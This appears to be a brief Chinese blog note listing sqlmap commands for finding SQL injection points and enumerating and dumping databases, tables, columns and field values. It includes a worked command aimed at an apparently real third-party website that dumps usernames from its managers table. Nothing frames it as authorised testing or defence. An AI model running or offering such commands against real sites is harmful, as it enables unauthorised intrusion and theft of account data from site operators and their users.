一些神奇的代码

sqlmap.py -u url 验证是否为注入点
sqlmap.py -u url --dbs 列出数据库系统的数据库
sqlmap.py -u url --tables -D db_name 列举数据库表

sqlmap.py -u url --columns -T table_name -D db_name 列举数据库表中的字段

sqlmap.py -u url --dump -C columns_name -T tables_name -D db_name 列举出字段值

./sqlmap.py -u "http://www.calin.com.tw/ab.php?id=1&item_id=3" --dump -C username --columns -T managers_tw -D dbcalin

https://zhuanlan.zhihu.com/p/36336483
https://www.cnblogs.com/anka9080/p/sqlmap.html

image.png

你可能感兴趣的:(一些神奇的代码)